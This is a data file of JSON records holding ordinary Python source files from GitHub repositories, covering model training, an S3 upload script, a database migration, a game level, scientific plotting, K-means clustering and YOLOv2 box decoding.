+{"seq_id":"26149505920","text":"import numpy as np\nimport pytorch_lightning as pl\nimport torch\nfrom sklearn.preprocessing import LabelEncoder\nfrom torch.utils.data import DataLoader, RandomSampler\n\nimport pandas as pd\nimport torch.nn.functional as F\nfrom google_landmarks2.gld_data import GldData\nfrom google_landmarks2.model import EffB0Arc\nfrom google_landmarks2.preproc import train_aug, valid_aug\nfrom torch.utils.data.sampler import Sampler\n\nSEED = 2334\ntorch.manual_seed(SEED)\nnp.random.seed(SEED)\n\ndevice = 0\n\n\nclass EffB0ArcLightning(pl.LightningModule):\n\n def __init__(self):\n super(EffB0ArcLightning, self).__init__()\n self.model = EffB0Arc(device=device, n_class=81313)\n self.model.to(device)\n\n def forward(self, x, y):\n pred, vec = self.model(x, y)\n return pred\n\n def training_step(self, train_batch, batch_idx):\n x, y = train_batch\n x = x.to(device)\n y = y.to(device)\n logits = self.forward(x, y)\n\n with torch.no_grad():\n _, predicted = torch.max(logits.data, 1)\n acc = (predicted == y).sum().item() / x.shape[0]\n\n loss = F.cross_entropy(logits, y)\n\n logs = {'train_loss': loss, 'train_acc': acc}\n\n return {'loss': loss, 'log': logs, 'acc': acc}\n\n def validation_step(self, val_batch, batch_idx):\n x, y = val_batch\n x = x.to(device)\n y = y.to(device)\n logits = self.forward(x, y)\n\n with torch.no_grad():\n _, predicted = torch.max(logits.data, 1)\n acc = (predicted == y).sum().item() / x.shape[0]\n\n loss = F.cross_entropy(logits, y)\n\n return {'val_loss': loss, 'val_acc': acc}\n\n def validation_epoch_end(self, outputs):\n avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n avg_acc = np.stack([x['val_acc'] for x in outputs]).mean()\n tensorboard_logs = {'val_loss': avg_loss, 'val_acc': avg_acc}\n return {'avg_val_loss': avg_loss, 'log': tensorboard_logs}\n\n def prepare_data(self):\n df = pd.read_csv('/home/lyan/Documents/kaggle/kaggle_landmarks/train_group_folds.csv')\n le = LabelEncoder()\n le.fit_transform(df.landmark_id)\n fold = 0\n train = df[df.fold != fold]\n valid = df[df.fold == fold]\n\n self.train_data = GldData(df=train, aug=train_aug, label_encoder=le)\n self.valid_data = GldData(df=valid, aug=valid_aug, label_encoder=le)\n\n def train_dataloader(self):\n iter_size = 32 * 4000\n sampler = torch.utils.data.sampler.RandomSampler(range(iter_size))\n bs = torch.utils.data.sampler.BatchSampler(sampler, batch_size=32, drop_last=False)\n\n return torch.utils.data.DataLoader(self.train_data,\n num_workers=6,\n batch_sampler=bs)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(self.valid_data, num_workers=6, batch_size=32, shuffle=False)\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)\n return optimizer\n\n\nif __name__ == '__main__':\n model = EffB0ArcLightning()\n trainer = pl.Trainer()\n\n trainer.fit(model)\n","repo_name":"dodler/kgl","sub_path":"google_landmarks2/arcface_start.py","file_name":"arcface_start.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"92"}
+{"seq_id":"12844647643","text":"import os\nimport time\nimport boto3\n\ndef upload_files_to_s3(event, context):\n s3_client = boto3.client('s3')\n folder_path = 'C:/CSCI5410/A3/t'\n\n for filename in os.listdir(folder_path):\n file_path = os.path.join(folder_path, filename)\n if os.path.isfile(file_path):\n time.sleep(0.1) # Delay of 100 milliseconds\n\n try:\n s3_client.upload_file(file_path, 'sampledata-b00932103', filename)\n print(f\"Uploaded {filename} to S3 bucket\")\n except Exception as e:\n print(f\"Failed to upload {filename}: {str(e)}\")\n\n return 'Upload completed'\n\nupload_files_to_s3(None, None)\n","repo_name":"mudraverma65/EntityExtractor-LambdaAWS","sub_path":"upload_files_to_s3.py","file_name":"upload_files_to_s3.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"24268929690","text":"\"\"\"Added unique values for City.name model\n\nRevision ID: c740ee99497a\nRevises: d40f260fed81\nCreate Date: 2023-06-11 21:13:27.979442\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c740ee99497a'\ndown_revision = 'd40f260fed81'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(None, 'city', ['name'])\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'city', type_='unique')\n # ### end Alembic commands ###\n","repo_name":"berezzin/Weather-collector","sub_path":"migrations/versions/c740ee99497a_added_unique_values_for_city_name_model.py","file_name":"c740ee99497a_added_unique_values_for_city_name_model.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"21134326496","text":"# commands.py\n\ndef todo_list(lists):\n '''Processing when a task list is received as the argument\n '''\n print('# Todo')\n for task in lists:\n if task['done'] == False:\n print(task['body'])\n \n print('\\n# Done')\n for task in lists:\n if task['done'] == True:\n print(task['body'])\n \ndef todo_add(lists, task_name):\n lists.append({'body': task_name, 'done': False})\n\n\ndef todo_done(lists, task_name):\n # exception handling for when the task does not exist\n for task in lists:\n if task_name in task['body']:\n task['done'] = True\n\n\ndef todo_clear(lists):\n rmv = []\n for task in lists:\n if task['done'] == True:\n rmv.append(task)\n for task in rmv:\n lists.remove(task)\n \n","repo_name":"Kentoooooooo/Growth-record","sub_path":"ToDoList/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"33295474784","text":"# Classic diagonal line of stay bricks\n\nSetMapName(\"The magic ball - by JCD\")\n\n# Add a number of bricks\nfor x in range(0,4,1):\n for y in range(0,10,1):\n AddBrick(\"brick\", 300 - 24 + x * 75, 120 - 8 + y*25,\n \"basic_brick_hit()\",\n \"graphics/bricks/red2_75.png\")\n\nfor y in range(3,7,1):\n AddBrick(\"brick\", 300 - 24 + -1 * 75, 120 - 8 + y*25,\n \"basic_brick_hit()\",\n \"graphics/bricks/red2_75.png\")\n\nfor y in range(3,7,1):\n AddBrick(\"brick\", 300 - 24 + 4 * 75, 120 - 8 + y*25,\n \"basic_brick_hit()\",\n \"graphics/bricks/red2_75.png\")\n\ndef this_map_brick_hit(x,y):\n # call basic_brick_hit\n basic_brick_hit()\n # look up the new brick to display\n AddBrick(\"brick\",x,y,\"basic_brick_hit()\",\"graphics/bricks/green2_75.png\")\n\ndef this_map_brick_hit2(x,y):\n # call basic_brick_hit\n basic_brick_hit()\n # look up the new brick to display\n AddBrick(\"brick\",x,y,\"this_map_brick_hit(10,500)\",\"graphics/bricks/green2_75.png\")\n\ndef this_map_brick_hit3(x,y):\n # call basic_brick_hit\n basic_brick_hit()\n # look up the new brick to display\n AddBrick(\"brick\",x,y,\"this_map_brick_hit(800-75-10,500)\",\"graphics/bricks/green2_75.png\")\n\ndef this_map_brick_hit4():\n # call basic_brick_hit\n basic_brick_hit()\n # look up the new brick to display\n for x in range(0,800,80):\n AddBrick(\"brick\",x,400,\"basic_brick_hit()\",\"graphics/bricks/blue2_75.png\")\n AddBrick(\"brick\",x,430,\"basic_brick_hit()\",\"graphics/bricks/yellow_stay_75.png\")\n\nAddBrick(\"brick\", 300 - 24 + 1 * 75, 120 - 8 + 10*25,\n \"this_map_brick_hit3(10,10),this_map_brick_hit(10,50)\",\n \"graphics/bricks/red2_75.png\")\n\nAddBrick(\"brick\", 300 - 24 + 2 * 75, 120 - 8 + 10*25,\n \"this_map_brick_hit2(800-75-10,10),this_map_brick_hit(800-75-10,50)\",\n \"graphics/bricks/red2_75.png\")\n\n\nAddBrick(\"brick\", 300 - 24 + 1 * 75, 120 - 8 + -1*25,\n \"this_map_brick_hit4()\",\n \"graphics/bricks/red2_75.png\")\n\n\nAddBrick(\"brick\", 300 - 24 + 2 * 75, 120 - 8 + -1*25,\n \"basic_brick_hit()\",\n \"graphics/bricks/red2_75.png\")\n\n\n#for t in range(0,360,30):\n# x = cos(t * factor) \n# y = sin(t * factor)\n# AddBrick(\"brick\", 400 - 24 + x*100, 220 - 8 + y*100,\n# \"basic_brick_hit()\",\n# \"graphics/bricks/green2_75.png\")\n\n\n# Add the walls\nStandardPlayField()\n\n# Add a paddle\nSetPaddle(366, 530, \"graphics/paddles/square2_75.png\")\n\n# define a round start function\ndef RoundStart():\n AddBallDefaultAtPos(10,100,\"graphics/balls/red.png\")\n\n# And, call it - probably will go\nRoundStart();\n","repo_name":"madsdyd/yanoid","sub_path":"data/maps/map8.py","file_name":"map8.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"71480220139","text":"#!/usr/bin/env python\n\"\"\"\nPlots 1-D CCFs of multiple energy channels together on one plot.\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\nfrom astropy.table import Table\nimport subprocess\nimport matplotlib.font_manager as font_manager\nfrom matplotlib.ticker import MultipleLocator\n\n__author__ = \"Abigail Stevens \"\n__year__ = \"2014-2017\"\n\n\n################################################################################\ndef type_positive_int(num):\n \"\"\"\n Check if an input is a positive integer, as an argparse type.\n\n Parameters\n ----------\n num : int, long, float, or double\n The number in question.\n\n Returns\n -------\n n : int\n The input number, if it's a positive integer\n\n Raises\n ------\n ArgumentTypeError if n isn't a real number or a positive integer.\n\n \"\"\"\n try:\n n = int(num)\n except (ValueError, TypeError):\n message = \"Input is not a positive integer.\"\n raise argparse.ArgumentTypeError(message)\n\n if n >= 0:\n return n\n else:\n message = \"%d is not a positive integer.\" % n\n raise argparse.ArgumentTypeError(message)\n\n\n################################################################################\ndef main(ccf_file, plot_file, prefix, t_len=30):\n \"\"\"\n Main method of plot_multi.py. Plots 1-D CCFs of multiple energy channels\n together on one plot.\n\n Parameters\n ----------\n ccf_file : str\n plot_file : str\n prefix : str\n t_len : int\n\n Returns\n -------\n nothing\n\t\n \"\"\"\n\t\n try:\n in_table = Table.read(ccf_file)\n except IOError:\n print(\"\\tERROR: File does not exist: %s\" % ccf_file)\n exit()\n\n ccf = in_table['CCF']\n error = in_table['ERROR']\n n_bins = in_table.meta['N_BINS']\n # dt = in_table.meta['DT']\n\n time_bins = np.arange(n_bins)\n pos_time_bins = time_bins[0:n_bins//2]\n neg_time_bins = time_bins[n_bins//2:] - n_bins\n time_bins = np.append(neg_time_bins, pos_time_bins)\n\n ccf_3 = ccf[:, 3]\n err_3 = error[:, 3]\n pos_t_ccf_3 = ccf_3[0:n_bins//2]\n neg_t_ccf_3 = ccf_3[n_bins//2:]\n ccf_3 = np.append(neg_t_ccf_3, pos_t_ccf_3)\n pos_t_err_3 = err_3[0:n_bins//2]\n neg_t_err_3 = err_3[n_bins//2:]\n err_3 = np.append(neg_t_err_3, pos_t_err_3)\n\n ccf_9 = ccf[:, 9]\n err_9 = error[:, 9]\n pos_t_ccf_9 = ccf_9[0:n_bins//2]\n neg_t_ccf_9 = ccf_9[n_bins//2:]\n ccf_9 = np.append(neg_t_ccf_9, pos_t_ccf_9)\n pos_t_err_9 = err_9[0:n_bins//2]\n neg_t_err_9 = err_9[n_bins//2:]\n err_9 = np.append(neg_t_err_9, pos_t_err_9)\n\n ccf_15 = ccf[:, 15]\n err_15 = error[:, 15]\n pos_t_ccf_15 = ccf_15[0:n_bins//2]\n neg_t_ccf_15 = ccf_15[n_bins//2:]\n ccf_15 = np.append(neg_t_ccf_15, pos_t_ccf_15)\n pos_t_err_15 = err_15[0:n_bins//2]\n neg_t_err_15 = err_15[n_bins//2:]\n err_15 = np.append(neg_t_err_15, pos_t_err_15)\n\n ccf_24 = ccf[:, 24]\n err_24 = error[:, 24]\n pos_t_ccf_24 = ccf_24[0:n_bins//2]\n neg_t_ccf_24 = ccf_24[n_bins//2:]\n ccf_24 = np.append(neg_t_ccf_24, pos_t_ccf_24)\n pos_t_err_24 = err_24[0:n_bins//2]\n neg_t_err_24 = err_24[n_bins//2:]\n err_24 = np.append(neg_t_err_24, pos_t_err_24)\n\t\n #############\n\t## Plotting!\n\t#############\n\t\n font_prop = font_manager.FontProperties(size=20)\n fig, ax = plt.subplots(1, 1, figsize=(10, 6), tight_layout=True, dpi=300)\n\n ax.vlines(0.0, -20, 25.0, linestyle='dotted', color='black', lw=1.5)\n ax.hlines(0.0, -100, 100, linestyle='dashed', color='black', lw=1.5)\n ax.errorbar(time_bins, ccf_3, yerr=err_3, linewidth=2, color='orange',\n elinewidth=2, capsize=2, label=\"3.5 keV\")\n 
ax.errorbar(time_bins, ccf_9, yerr=err_9, linewidth=2, elinewidth=2,\n capsize=2, label=\"6 keV\")\n ax.errorbar(time_bins, ccf_15, yerr=err_15, linewidth=2, elinewidth=2,\n capsize=2, label=\"10.5 keV\")\n ax.errorbar(time_bins, ccf_24, yerr=err_24, linewidth=2, elinewidth=2,\n capsize=2, label=\"18 keV\")\n\n # ax.set_xlabel(r'Time-delay ($\\times\\,$8.15$\\,$ms)',\n # fontproperties=font_prop)\n delay = in_table.meta['DT'] * 1000\n ax.set_xlabel(r'Time-delay ($\\times\\,$%.2f$\\,$ms)' % delay,\n fontproperties=font_prop)\n ax.set_ylabel('Deviation from mean (cts$\\;$s$^{-1}$)', \\\n \tfontproperties=font_prop)\n ax.set_xlim(-t_len, t_len)\n ax.set_ylim(-10, 15)\n # ax.set_ylim(-1, 1)\n\n ## Setting the axes' minor ticks. It's complicated.\n x_maj_loc = ax.get_xticks()\n # x_maj_loc = [0, 50, 100]\n # ax.set_xticks(x_maj_loc)\n y_maj_loc = ax.get_yticks()\n\n x_min_mult = 0.25 * (x_maj_loc[1] - x_maj_loc[0])\n y_min_mult = 1.0\n xLocator = MultipleLocator(x_min_mult) ## loc of minor ticks on x-axis\n yLocator = MultipleLocator(y_min_mult) ## loc of minor ticks on y-axis\n ax.xaxis.set_minor_locator(xLocator)\n ax.yaxis.set_minor_locator(yLocator)\n\n ax.tick_params(axis='x', labelsize=20)\n ax.tick_params(axis='y', labelsize=20)\n ax.tick_params(which='major', width=1.5, length=7)\n ax.tick_params(which='minor', width=1.5, length=4)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(1.5)\n ax.set_title(\"%s, CCF per energy channel\" % prefix,\n fontproperties=font_prop)\n\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles, labels, loc='upper right', fontsize=18,\n borderpad=0.5, labelspacing=0.5, borderaxespad=0.5)\n\t\n plt.savefig(plot_file)\n # plt.show()\n plt.close()\n # subprocess.call(['cp', plot_file, \\\n # \"/Users/abigailstevens/Dropbox/Research/CCF_paper1/\"])\n\n\n################################################################################\nif __name__ == \"__main__\":\n\t\n parser = argparse.ArgumentParser(usage=\"python plot_multiccfs.py ccf_table\"\\\n \" plot_file [-p prefix]\", description=\"Plots CCFs of multiple \"\\\n \"energy channels on one plot.\")\n\t\n parser.add_argument('ccf_table', help=\"Name of file with CCF amplitudes in\"\\\n \"a table.\")\n\t\n parser.add_argument('plot_file', help=\"The output file name for the plot.\")\n\t\n parser.add_argument('-p', '--prefix', dest='prefix', default=\"--\",\n help=\"The identifying prefix of the data (object nickname or \"\\\n \"proposal ID). [--]\")\n\n parser.add_argument('-l', '--length', dest='t_length', default=30,\n type=type_positive_int,\n help=\"Number of time bins to plot on either side of 0. [30]\")\n\n args = parser.parse_args()\n\n # print(\"Input file: %s\" % args.ccf_table)\n\n main(args.ccf_table, args.plot_file, args.prefix, t_len=args.t_length)\n\t\n################################################################################\n","repo_name":"abigailStev/cross_correlation","sub_path":"plot_multi.py","file_name":"plot_multi.py","file_ext":"py","file_size_in_byte":6813,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"}
+{"seq_id":"28661715757","text":"'''\nAku membaca detail latihan yang sudah ia catatkan untukku:\n\nDataset ini merupakan data customer suatu mall dan berisi basic informasi customer berupa : CustomerID, age, gender, annual income, dan spending score. Adapun tujuan dari clustering adalah untuk memahami customer - customer mana saja yang sering melakukan transaksi sehingga informasi ini dapat diberikan kepada marketing team untuk membuat strategi promosi yang sesuai dengan karakteristik customer.\n\n \n\n“Kita akan melakukan segmentasi customer, dengan memanfaatkan fungsi KMeans dari Scikit-Learn.cluster. Silakan berlatih dengan intruksi di catatan tadi ya, Aksara.”\n\nAku membuka kembali catatan yang berisi intruksi Senja:\n\nImport pandas sebagai aliasnya dan KMeans dari sklearn.cluster.\nLoad dataset 'https://storage.googleapis.com/dqlab-dataset/pythonTutorial/mall_customers.csv' dan beri nama dataset\nDiasumsikan EDA dan preprocessing sudah dilakukan, selanjutnya kita memilih feature yang akan digunakan untuk membuat model yaitu annual_income dan spending_score. Assign dataset dengan feature yang sudah dipilih ke dalam 'X'. Pada dasarnya terdapat teknik khusus yang dilakukan untuk menyeleksi feature - feature (Feature Selection) mana saja yang dapat digunakan untuk machine learning modelling, karena tidak semua feature itu berguna. Beberapa feature justru bisa menyebabkan performansi model menurun. Tetapi untuk problem ini, secara default kita akan menggunakan annual_income dan spending_score.\nDeklarasikan KMeans( ) dengan nama cluster_model dan gunakan n_cluster = 5. n_cluster adalah argumen dari fungsi KMeans( ) yang merupakan jumlah cluster/centroid (K). random_state = 24.\nGunakan fungsi .fit_predict( ) dari cluster_model pada 'X' untuk proses clustering.\n'''\n#import library\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.cluster import KMeans\n\n# load dataset\ndataset = pd.read_csv(\n 'https://storage.googleapis.com/dqlab-dataset/pythonTutorial/mall_customers.csv')\n\n# selecting features\nX = dataset[['annual_income', 'spending_score']]\n\n# Define KMeans as cluster_model\ncluster_model = KMeans(n_clusters=5, random_state=24)\nlabels = cluster_model.fit_predict(X)\n\n\n'''\nInspect & Visualizing the Cluster\n“Satu lagi, Aksara kalau sudah membuat cluster, tolong visualisasikan hasil dari clustering yang telah kamu lakukan sebelumnya ya. 
Langkah-langkahnya sudah saya email,” tambah Senja lagi tepat saat aku sedang membuka pesan berisi intruksi tambahan darinya:\n\nPertama - tama, import matplotlib.pyplot dan beri inisial plt.\nGunakan fungsi .values untuk mengubah tipe ‘X’ dari dataframe menjadi array\nPisahkan X kedalam xs dan ys, di mana xs adalah Kolom index [0] dan ys adalah kolom index [1]\nBuatlah scatter plot plt.scatter() dari xs dan ys, kemudian tambahkan c = labels untuk secara otomatis memberikan warna yang berbeda pada setiap cluster, dan alpha = 0.5 ke dalam scatter plot argumen.\nHitunglah koordinat dari centroid menggunakan .cluster_centers_ dari cluster_model, deklarasikan ke dalam variabel centroids.\nPisahkan centroids kedalam centroids_x dan centroids_y, di mana centroids_x adalah kolom index [0] dan centroids_y adalah kolom index [1]\nBuatlah scatter plot dari centroids_x dan centroids_y , gunakan ‘D’ (diamond) sebagai marker parameter, dengan ukuran 50, s = 50\n'''\n\n#import library\n\n# convert dataframe to array\nX = X.values\n# Separate X to xs and ys --> use for chart axis\nxs = X[:, 0]\nys = X[:, 1]\n# Make a scatter plot of xs and ys, using labels to define the colors\nplt.scatter(xs, ys, c=labels, alpha=0.5)\n\n# Assign the cluster centers: centroids\ncentroids = cluster_model.cluster_centers_\n# Assign the columns of centroids: centroids_x, centroids_y\ncentroids_x = centroids[:, 0]\ncentroids_y = centroids[:, 1]\n# Make a scatter plot of centroids_x and centroids_y\nplt.scatter(centroids_x, centroids_y, marker='D', s=50)\nplt.title('K Means Clustering', fontsize=20)\nplt.xlabel('Annual Income')\nplt.ylabel('Spending Score')\nplt.show()\n","repo_name":"AldiMuhammadFarhan/Kodingan_Python","sub_path":"K-MeansClusteringPraktek.py","file_name":"K-MeansClusteringPraktek.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
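The tutorial record above fixes n_clusters = 5 up front. A minimal sketch, not part of the tutorial, of how that K could be sanity-checked with the elbow method on the same two features:

```python
# Elbow-method sketch on the same mall_customers features; the explicit
# n_init=10 matches older scikit-learn defaults.
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans

dataset = pd.read_csv(
    'https://storage.googleapis.com/dqlab-dataset/pythonTutorial/mall_customers.csv')
X = dataset[['annual_income', 'spending_score']]

inertias = []
for k in range(1, 11):
    km = KMeans(n_clusters=k, random_state=24, n_init=10).fit(X)
    inertias.append(km.inertia_)  # within-cluster sum of squared distances

plt.plot(range(1, 11), inertias, marker='o')
plt.xlabel('Number of clusters (K)')
plt.ylabel('Inertia')
plt.show()
```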
+{"seq_id":"43352141910","text":"import tkinter as gui\r\nfrom tkinter import ttk\r\n\r\n\r\ndef buscar(a, conexion, cnxn, tree):\r\n\r\n b = conexion.buscar(cnxn, a.get())\r\n tree.delete(*tree.get_children())\r\n\r\n tree.heading('#0', text='Nickname')\r\n tree.heading('correo', text='Correo')\r\n\r\n for c in b:\r\n tree.insert('',gui.END, text = c[0], values=(c[1]))\r\n \r\n\r\ndef informacion(cuadro1, usuario, correo, tree, conexion, cnxn):\r\n\r\n cuadro1.columnconfigure(0, weight = 4)\r\n cuadro1.columnconfigure(1, weight = 4)\r\n cuadro1.columnconfigure(2, weight = 0)\r\n\r\n labelCuadro1 = ttk.Label(cuadro1, text = 'Nickname: ' + usuario[1])\r\n labelCuadro1.grid(column = 0, row = 0, sticky = gui.W)\r\n\r\n labelCuadro2 = ttk.Label(cuadro1, text = 'Correo: ' + correo)\r\n labelCuadro2.grid(column = 1, row = 0, sticky = gui.W)\r\n\r\n a = ttk.Entry(cuadro1)\r\n a.grid(column = 0, row = 1, sticky = gui.W)\r\n\r\n b = ttk.Button(cuadro1, text = 'buscar', command = lambda: buscar(a, conexion, cnxn, tree))\r\n b.grid(column = 1, row = 1, sticky = gui.W)\r\n\r\n tree.grid(column = 0, row = 2)\r\n\r\nif __name__ == '__informacion__':\r\n informacion()\r\n","repo_name":"RomanFloresM/tkinter-connect-with-sql","sub_path":"tkinter connect with sql/py/frames/informacion.py","file_name":"informacion.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"74107352300","text":"import tensorflow as tf\nimport math\nimport numpy as np\nimport random\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom PIL import Image\nfrom tensorflow.python.platform import gfile\n\nINPUTE_SIZE = 416\nCLASS_NUM = 1\nCELL_NUM = 13\nANCHOR_NUM = 5\nTHRESHOLD = 0.3\nOVERLAP_THRESHOLD = 0.5\n\nclass BoundingBox():\n def __init__(self, x, y, w, h, confidence, classes):\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n self.confidence = confidence\n self.classes = classes\n\nclass BoundingBoxPosition():\n def __init__(self, left, right, top, bottom):\n self.left = left\n self.right = right\n self.top = top\n self.bottom = bottom\n\n\ndef fill_image(img, inputSize):\n img_w, img_h = img.shape[1], img.shape[0]\n w, h = inputSize\n\n new_w = int(img_w * min(w/img_w, h/img_h))\n new_h = int(img_h * min(w/img_w, h/img_h))\n resized_image = cv2.resize(img, (new_w, new_h), interpolation=cv2.INTER_CUBIC)\n\n canvas = np.full((inputSize[1], inputSize[0], 3), 128)\n canvas[(h-new_h)//2:(h-new_h)//2 + new_h,(w-new_w)//2:(w-new_w)//2 + new_w, :] = resized_image\n \n return canvas\n\ndef sigmoid(x):\n return 1 / (1 + math.exp(-x))\n\ndef softmax(x):\n summ = 0\n params = np.zeros(len(x))\n for i in range(len(x)):\n params[i] = math.exp(x[i])\n summ += math.exp(x[i])\n if(np.isnan(summ) or summ<0):\n for i in range(len(x)):\n params[i] = 1 / len(x)\n else:\n for i in range(len(x)):\n params[i] = params[i] / summ\n return params\n\ndef argmax(params):\n maxIndex = 0\n for i in range(len(params)):\n if (params[maxIndex] < params[i]):\n maxIndex = i\n return maxIndex, params[maxIndex]\n\nanchors = [0.672, 0.856, 0.406, 0.73866667, 0.898, 0.92168675, 0.268, 0.4024024, 0.59, 0.55466667]\ndef getAnchorBox(tensorFlowOutput, cellCol, cellRow, box, numClass, offset):\n x = (cellCol + sigmoid(tensorFlowOutput[offset])) * 32\n y = (cellRow + sigmoid(tensorFlowOutput[offset+1])) * 32\n w = math.exp(tensorFlowOutput[offset+2]) * anchors[2*box] * 32\n h = math.exp(tensorFlowOutput[offset+3]) * anchors[2*box + 1] * 32\n confidence = sigmoid(tensorFlowOutput[offset+4])\n classes = []\n for i in range(numClass):\n classes.append(tensorFlowOutput[i+offset+5])\n return BoundingBox(x, y, w, h, confidence, classes)\n\ndef getBestBoundingBox(bbox):\n label, param = argmax(softmax(bbox.classes))\n confidenceOfClass = param * bbox.confidence\n if (confidenceOfClass > THRESHOLD):\n tempLeft = bbox.x - bbox.w/2\n tempTop = bbox.y - bbox.h/2\n tempRight = tempLeft + bbox.w\n tempBottom = tempTop + bbox.h\n\n left = min(tempLeft, tempRight)\n right = max(tempLeft, tempRight)\n top = min(tempTop, tempBottom)\n bottom = max(tempTop, tempBottom)\n return [confidenceOfClass, BoundingBoxPosition(left, right, top, bottom), label]\n else:\n return None\n\n\ndef isOverlap(firstPosition, secondPosition):\n return ((firstPosition.leftsecondPosition.left) \n and (firstPosition.topsecondPosition.top))\n\ndef calculateIoU(firstPosition, secondPosition):\n if(isOverlap(firstPosition, secondPosition)):\n firstPositionArea = abs(firstPosition.right-firstPosition.left) * abs(firstPosition.bottom-firstPosition.top)\n secondPositionArea = abs(secondPosition.right-secondPosition.left) * abs(secondPosition.bottom-secondPosition.top)\n intersectionArea = (max(0, min(firstPosition.right, secondPosition.right)-max(firstPosition.left, secondPosition.left)) * \n max(0, min(firstPosition.bottom, secondPosition.bottom)-max(firstPosition.top, secondPosition.top)))\n\n unionArea = 
firstPositionArea + secondPositionArea - intersectionArea\n return intersectionArea / unionArea\n else:\n return 0\n\ndef NonMaximumSuppression(bboxes):\n bboxes = sorted(bboxes)\n positions = [position[1] for position in bboxes] # get position object\n outputBoxes = []\n if(len(positions)>0):\n bestBox = positions.pop()\n outputBoxes.append(bestBox)\n for _ in range(len(positions)):\n secondaryBox = positions.pop()\n overlap = False\n for firstBox in outputBoxes:\n overlap = overlap or (calculateIoU(firstBox, secondaryBox) > OVERLAP_THRESHOLD)\n if(not overlap):\n outputBoxes.append(secondaryBox)\n return outputBoxes\n return outputBoxes\n\n\n\nmodel = './yolov2_dog.pb'\noriginImage = Image.open('image/testImage.jpg')\n\n\noriginImage = np.array(originImage)\nresizeImage = fill_image(originImage, [INPUTE_SIZE, INPUTE_SIZE])\nimage = resizeImage[np.newaxis, :, :, :]\nimage = (image-128)/128.0\n\nwith tf.Session() as sess:\n with gfile.FastGFile(model, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='')\n\n x = sess.graph.get_tensor_by_name('input:0')\n y = sess.run(sess.graph.get_tensor_by_name('output:0'), {x: image})\n\npositionList = []\nfor cellRow in range(CELL_NUM):\n for cellCol in range(CELL_NUM):\n offset = 0\n for box in range(ANCHOR_NUM):\n cell = y[0, cellRow, cellCol, :]\n boundingBox = getAnchorBox(cell, cellCol, cellRow, box, CLASS_NUM, offset)\n boundingBoxPosition = getBestBoundingBox(boundingBox)\n if boundingBoxPosition != None:\n positionList.append(boundingBoxPosition)\n offset = offset + 5 + CLASS_NUM \n\nrecognation = NonMaximumSuppression(positionList)\n\n\nplt.imshow(resizeImage)\ncurrentAxis = plt.gca()\nfor i in range(len(recognation)):\n rectangle = patches.Rectangle((recognation[i].left, recognation[i].top), (recognation[i].right-recognation[i].left), \n (recognation[i].bottom-recognation[i].top), \n linewidth=1, edgecolor='r', facecolor='none')\n currentAxis.add_patch(rectangle)\nplt.show()\n","repo_name":"andy1000335/get_YOLOv2_output","sub_path":"YOLOv2.py","file_name":"YOLOv2.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
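calculateIoU in the YOLOv2 record works on one pair of BoundingBoxPosition objects per call. A hedged NumPy sketch of the same intersection-over-union computed for one box against many (helper name mine; boxes given as [left, top, right, bottom]):

```python
import numpy as np

def iou_one_vs_many(box, boxes):
    # Intersection rectangle, clipped to zero width/height when disjoint.
    ix1 = np.maximum(box[0], boxes[:, 0])
    iy1 = np.maximum(box[1], boxes[:, 1])
    ix2 = np.minimum(box[2], boxes[:, 2])
    iy2 = np.minimum(box[3], boxes[:, 3])
    inter = np.clip(ix2 - ix1, 0, None) * np.clip(iy2 - iy1, 0, None)
    area_a = (box[2] - box[0]) * (box[3] - box[1])
    areas_b = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])
    return inter / (area_a + areas_b - inter)

boxes = np.array([[1, 1, 3, 3], [2, 2, 4, 4]])
print(iou_one_vs_many(np.array([0, 0, 2, 2]), boxes))  # [0.1428..., 0.0]
```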
